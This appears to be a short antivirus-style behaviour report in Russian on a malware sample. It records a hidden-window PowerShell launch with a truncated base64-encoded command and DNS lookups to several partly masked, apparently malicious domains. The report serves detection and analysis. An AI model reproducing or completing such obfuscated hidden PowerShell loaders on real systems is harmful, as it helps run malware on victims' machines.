Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABIAG8AbQBlAF8ATABvAGEAbgBfAEEAYwBjAG8AdQBuAHQAbwBiAGwAPQAnAEEAcgB1AGIAYQBuAF8ARwB1AGkAbABkAGUAcgB...
- DNS ASK im###obals.com
- DNS ASK ri#####ompetisiblog.com
- DNS ASK ol###rfps.com
- DNS ASK ku######internetsitesi.com
- DNS ASK nj###mbh.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABIAG8AbQBlAF8ATABvAGEAbgBfAEEAYwBjAG8AdQBuAHQAbwBiAGwAPQAnAEEAcgB1AGIAYQBuAF8ARwB1AGkAbABkAGUAcgB...' (со скрытым окном)